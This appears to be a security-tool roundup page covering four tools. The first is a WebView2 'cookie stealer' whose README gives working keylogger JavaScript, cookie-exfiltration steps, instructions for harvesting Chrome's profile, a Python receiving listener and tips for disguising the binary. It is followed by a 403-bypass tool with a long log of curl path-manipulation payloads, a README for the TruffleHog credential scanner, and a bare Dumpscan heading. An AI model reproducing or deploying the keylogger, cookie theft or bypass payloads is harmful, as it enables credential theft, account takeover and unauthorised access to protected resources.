
WebView2-Cookie-Stealer - Attacking With WebView2 Applications



Please read this blog post to get more information.

Source Code

This code is a modified version of Microsoft's WebView2 Code. The current code can be cleaned up and made much better.


Demo

Launch Example



Usage Example



Usage

Tested on Windows 10 & 11.

When the binary is executed, https://office.com/login is loaded. A JavaScript keylogger is injected into every page, and keystrokes are sent to http://127.0.0.1:8080. Furthermore, once the user successfully authenticates, the cookies for login.microsoftonline.com are base64-encoded and sent to http://127.0.0.1:8080 via an HTTP GET request.
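
For context on what receives this traffic, here is a minimal sketch of an attacker-side listener built only on the Python standard library. It is not part of this project; the /keylog path and k parameter match the injected JavaScript shown below, while the cookies parameter name is purely a hypothetical stand-in for however the cookie GET request is shaped.

import base64
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        if self.path.startswith("/keylog"):
            # keystrokes arrive as the accumulated "k" parameter
            print("[keystrokes]", query.get("k", [""])[0])
        elif "cookies" in query:  # hypothetical parameter name for the cookie blob
            print("[cookies]", base64.b64decode(query["cookies"][0]).decode(errors="replace"))
        self.send_response(200)
        self.end_headers()

HTTPServer(("127.0.0.1", 8080), ExfilHandler).serve_forever()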

Modifying JavaScript

If you'd like to modify the JavaScript, the code that needs to be changed is shown below; it is at line 1096 in AppWindow.cpp.

coreWebView2->AddScriptToExecuteOnDocumentCreated(L"var link = \"http://127.0.0.1:8080/keylog?k=\";var l = \"\";document.onkeypress = function (e){l += e.key;var req = new XMLHttpRequest();req.open(\"GET\",link.concat(l), true);req.send();}", nullptr);

Stealing Chrome Cookies

WebView2 allows you to launch with an existing User Data Folder (UDF) rather than creating a new one. The UDF contains all passwords, sessions, bookmarks, etc. Chrome's UDF is located at C:\Users\<username>\AppData\Local\Google\Chrome\User Data. We can simply tell WebView2 to start the instance using this profile and, upon launch, extract all cookies and transfer them to the attacker's server.

The only catch is that WebView2 looks for a folder called EBWebView instead of User Data (not sure why). Copy the User Data folder and rename it to EBWebView.
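
A hedged sketch of staging that copy from Python (the destination parent is the userDataFolder path you set below; copying while Chrome is running can fail on locked files):

import os, shutil

src = os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data")
dst = r"C:\Path\To\Temp\EBWebView"   # the folder name WebView2 expects

# dirs_exist_ok allows re-runs; locked files (Chrome open) raise an error
shutil.copytree(src, dst, dirs_exist_ok=True)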

Required Changes

  • At line 41 in app.cpp:

    • Change std::wstring userDataFolder(L""); to std::wstring userDataFolder(L"C:\\Path\\To\\Temp");
    • The specified folder must contain the EBWebView folder which WebView2 will read from.
  • At line 40 in ScenarioCookieManagement.cpp:

    • Change GetCookiesHelper(L"https://login.microsoftonline.com"); to GetCookiesHelper(L"");

When GetCookiesHelper is invoked without a website being provided, it will extract all cookies.

Note: This will not work with the current application if there is a large quantity of cookies, because the application sends them using a GET request, which has a length limit.
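
One way around that limit, sketched below rather than implemented in this code, is to split the base64 blob into chunks and send one GET per chunk; the /c endpoint and parameter names are hypothetical:

import base64, urllib.request

def exfil_chunked(data: bytes, url="http://127.0.0.1:8080/c", chunk=1500):
    # urlsafe alphabet avoids '+' and '/' needing further URL encoding
    blob = base64.urlsafe_b64encode(data).decode()
    for i in range(0, len(blob), chunk):
        # seq lets the server reassemble the chunks in order
        urllib.request.urlopen(f"{url}?seq={i // chunk}&d={blob[i:i + chunk]}")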

Important Functions

If you'd like to make modifications to the binary you'll find information about the important functions below.

  • AppStartPage.cpp - GetUri() function has the URL that is loaded upon binary execution.
  • ScenarioCookieManagement.cpp - SendCookies() function contains the IP address and port where the cookies are sent.
  • AppWindow.cpp - CallCookieFunction() function waits until the URL starts with https://www.office.com/?auth= and calls ScenarioCookieManagement::GetCookiesHelper(L"https://login.microsoftonline.com")
  • WebView2APISample.rc - Cosmetic changes
    • Remove the menu bar by setting all POPUP values to "".
    • Change IDS_APP_TITLE and IDC_WEBVIEW2APISAMPLE. This is the name of the application in the title bar.
    • Change IDI_WEBVIEW2APISAMPLE and IDI_WEBVIEW2APISAMPLE_INPRIVATE and IDI_SMALL. These point to a .ico file which is the icon for this application.
  • Toolbar.cpp - itemHeight must be set to 0 to remove the top menu. This is already taken care of in this code.
  • AppWindow.cpp - LoadImage() should be commented out. This hides the blue splash image. This is already taken care of in this code.
  • App.cpp - new AppWindow(creationModeId, WebViewCreateOption(), initialUri, userDataFolder, false); change the last param value to true. This hides the toolbar. This is already taken care of in this code.



Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page



Tool that tests MANY url bypasses to reach a 40X protected page.

If you wonder why this code is nothing but a dirty curl wrapper, here's why:

  • Most of the Python request libraries do url/path/parameter encoding/decoding, and I hate this.
  • If I submit raw chars, I want raw chars to be sent.
  • If I send a weird path, I want it weird, not normalized.

This is surprisingly hard to achieve in Python without losing all of the lib goodies like parsing, ssl/tls encapsulation and so on.
So, be like me, use curl as a backend, it's gonna be just fine.
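
The same trick in miniature, assuming curl is on PATH: shell out with --path-as-is (and -g to disable globbing) so the payload path hits the wire byte-for-byte, exactly like the generated commands in the log below:

import subprocess

def raw_request(url: str) -> str:
    # --path-as-is stops curl from squashing /../ and //; -k skips TLS checks
    proc = subprocess.run(
        ["curl", "-sS", "-kgi", "--path-as-is",
         "-w", r"\nStatus: %{http_code}, Length: %{size_download}", url],
        capture_output=True, text=True,
    )
    return proc.stdout

print(raw_request("http://127.0.0.1/juicy_403_endpoint/%2e%2e//"))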


Setup for bypass.py

# Deps
sudo apt install -y bat curl virtualenv python3
# Tool
virtualenv -p python3 .py3
source .py3/bin/activate
pip install -r requirements.txt
./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"

Usage

Expected result
2022-05-10 15:54:03 work bup[738125] INFO === Config ===
2022-05-10 15:54:03 work bup[738125] INFO debug: False
2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list
2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:03 work bup[738125] INFO threads: 20
2022-05-10 15:54:03 work bup[738125] INFO timeout: 2
2022-05-10 15:54:03 work bup[738125] INFO headers: {}
2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls
2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com
2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list
2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'
2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'
[...]
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2e%2e%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%20%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3b%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%2f%3f///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b//%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2e%2e/..%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b/%2f%2f..///list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%09//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f..//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e.//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3b%2f%2e%2e%2f%2e%2e%2f%2f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%23//list'
2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%3f%3f//list'
2022-05-10 15:54:09 work bup[738125] WARNING Stage: save_and_quit
2022-05-10 15:54:10 work bup[738125] INFO Saving html pages and short output in: /tmp/tmp48drf_ie-bypass-url-parser
2022-05-10 15:54:10 work bup[738125] INFO Triaged results shows the following distinct pages:
9: 41 - 850a2bd214c68f582aaac1c84c702b5d.html
10: 97 - 219145da181c48fea603aab3097d8201.html
10: 99 - 309b8397d07f618ec07541c418979a84.html
10: 100 - 9a1304f66bfee2130b34258635d50171.html
10: 108 - b61052875693afa4b86d39321d4170b4.html
10: 109 - 6fb5c59f5c29d23e407d6f041523a2bb.html
11: 101 - 045d36e3cfba7f6cbb7e657fc6cf1125.html
12:43116 - 9787a734c56b37f7bf5d78aaee43c55d.html
16: 41 - c5663aedf1036c950a5d83bd83c8e4e7.html
21: 156 - 7857d3d4a9bc8bf69278bf43c4918909.html
22: 107 - 011ca570bdf2e5babcf4f99c4cd84126.html
22: 109 - 6d4b61258386f744a388d402a5f11d03.html
22: 110 - 2f26cd3ba49e023dbda4453e5fd89431.html
76: 821 - bfe5f92861f949e44b355ee22574194a.html
2022-05-10 15:54:10 work bup[738125] INFO Also, inspect them manually with batcat:
echo /tmp/tmp48drf_ie-bypass-url-parser/{850a2bd214c68f582aaac1c84c702b5d.html,219145da181c48fea603aab3097d8201.html,309b8397d07f618ec07541c418979a84.html,9a1304f66bfee2130b34258635d50171.html,b61052875693afa4b86d39321d4170b4.html,6fb5c59f5c29d23e407d6f041523a2bb.html,045d36e3cfba7f6cbb7e657fc6cf1125.html,9787a734c56b37f7bf5d78aaee43c55d.html,c5663aedf1036c950a5d83bd83c8e4e7.html,7857d3d4a9bc8bf69278bf43c4918909.html,011ca570bdf2e5babcf4f99c4cd84126.html,6d4b61258386f744a388d402a5f11d03.html,2f26cd3ba49e023dbda4453e5fd89431.html,bfe5f92861f949e44b355ee22574194a.html} | xargs bat


Trufflehog - Find Credentials All Over The Place


TruffleHog

Find leaked credentials.


Join The Slack

Have questions? Feedback? Jump in Slack and hang out with us:

https://join.slack.com/t/trufflehog-community/shared_invite/zt-pw2qbi43-Aa86hkiimstfdKH9UCpPzQ

Demo

Find credentials all over the place

docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity

What's new in v3?

TruffleHog v3 is a complete rewrite in Go with many new powerful features.

  • We've added over 700 credential detectors that support active verification against their respective APIs.
  • We've also added native support for scanning GitHub, GitLab, filesystems, and S3.
  • Instantly verify private keys against millions of github users and billions of TLS certificates using our Driftwood technology.

What is credential verification?

For every potential credential that is detected, we've painstakingly implemented programmatic verification against the API that we think it belongs to. Verification eliminates false positives. For example, the AWS credential detector performs a GetCallerIdentity API call against the AWS API to verify if an AWS credential is active.
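
The AWS example translates directly to a few lines of Python with boto3 (an illustration of the verification idea, not TruffleHog's Go implementation):

import boto3
from botocore.exceptions import ClientError

def aws_key_is_live(access_key: str, secret_key: str) -> bool:
    sts = boto3.client(
        "sts",
        aws_access_key_id=access_key,
        aws_secret_access_key=secret_key,
    )
    try:
        sts.get_caller_identity()   # only succeeds for active credentials
        return True
    except ClientError:
        return False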

Installation

Several options:

1. Go

git clone https://github.com/trufflesecurity/trufflehog.git

cd trufflehog; go install

2. Release binaries

3. Docker

Note: Apple M1 hardware users should run with docker run --platform linux/arm64 for better performance.

Most users

docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys

Apple M1 users

The linux/arm64 image runs better on the M1 than the amd64 image. Even better is running the native darwin binary, but there is no container image for that.

docker run --platform linux/arm64 -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --repo https://github.com/trufflesecurity/test_keys 

4. Pip (help wanted)

It's possible to distribute binaries in pip wheels.

Here is an example of a project that does it.

Help with setting up this packaging would be appreciated!

5. Brew

brew tap trufflesecurity/trufflehog
brew install trufflehog

Usage

TruffleHog has a sub-command for each source of data that you may want to scan:

  • git
  • github
  • gitlab
  • S3
  • filesystem
  • syslog
  • file and stdin (coming soon)

Each subcommand can have options that you can see with the -h flag provided to the subcommand:

$ trufflehog git --help
usage: TruffleHog git [<flags>] <uri>

Find credentials in git repositories.

Flags:
      --help                     Show context-sensitive help (also try --help-long and --help-man).
      --debug                    Run in debug mode.
      --version                  Prints trufflehog version.
  -j, --json                     Output in JSON format.
      --json-legacy              Use the pre-v3.0 JSON format. Only works with git, gitlab, and github sources.
      --concurrency=1            Number of concurrent workers.
      --no-verification          Don't verify the results.
      --only-verified            Only output verified results.
      --print-avg-detector-time  Print the average time spent on each detector.
      --no-update                Don't check for updates.
  -i, --include-paths=INCLUDE-PATHS
                                 Path to file with newline separated regexes for files to include in scan.
  -x, --exclude-paths=EXCLUDE-PATHS
                                 Path to file with newline separated regexes for files to exclude in scan.
      --since-commit=SINCE-COMMIT
                                 Commit to start scan from.
      --branch=BRANCH            Branch to scan.
      --max-depth=MAX-DEPTH      Maximum depth of commits to scan.
      --allow                    No-op flag for backwards compat.
      --entropy                  No-op flag for backwards compat.
      --regex                    No-op flag for backwards compat.

Args:
  <uri>  Git repository URL. https:// or file:// schema expected.

For example, to scan a git repository, start with

$ trufflehog git https://github.com/trufflesecurity/trufflehog.git

Exit Codes:

  • 0: No errors and no results were found.
  • 1: An error was encountered. Sources may not have completed scans.
  • 183: No errors were encountered, but results were found. Will only be returned if --fail flag is used.
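
Those codes make CI gating straightforward; a small sketch that wraps the scanner with subprocess:

import subprocess

proc = subprocess.run(
    ["trufflehog", "git", "--fail", "--only-verified",
     "https://github.com/trufflesecurity/trufflehog.git"]
)
if proc.returncode == 183:     # results found (see the exit-code list above)
    raise SystemExit("leaked credentials detected")
if proc.returncode == 1:       # the scan itself errored
    raise SystemExit("scan did not complete cleanly")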

Scanning an organization

Try scanning an entire GitHub organization with the following:

docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog:latest github --org=trufflesecurity

TruffleHog OSS Github Action

- name: TruffleHog OSS
  uses: trufflesecurity/trufflehog@main
  with:
    # Repository path
    path:
    # Start scanning from here (usually main branch).
    base:
    # Scan commits until here (usually dev branch).
    head: # optional

The TruffleHog OSS Github Action can be used to scan a range of commits for leaked credentials. The action will fail if any results are found.

For example, to scan the contents of pull requests you could use the following workflow:

name: Leaked Secrets Scan
on: [pull_request]
jobs:
  TruffleHog:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout code
        uses: actions/checkout@v3
        with:
          fetch-depth: 0
      - name: TruffleHog OSS
        uses: trufflesecurity/trufflehog@v3.4.3
        with:
          path: ./
          base: ${{ github.event.repository.default_branch }}
          head: HEAD

Contributors

This project exists thanks to all the people who contribute.

Contributing

Contributions are very welcome! Please see our contribution guidelines first.

We no longer accept contributions to TruffleHog v2, but that code is available in the v2 branch.

Adding new secret detectors

We have published some documentation and tooling to get started on adding new secret detectors. Let's improve detection together!

License Change

Since v3.0, TruffleHog is released under an AGPL 3 license, included in LICENSE. TruffleHog v3.0 uses none of the previous codebase, but care was taken to preserve backwards compatibility on the command line interface. The work previous to this release is still available licensed under GPL 2.0 in the history of this repository and the previous package releases and tags. A completed CLA is required for us to accept contributions going forward.



Dumpscan - Tool To Extract And Dump Secrets From Kernel And Windows Minidump Formats



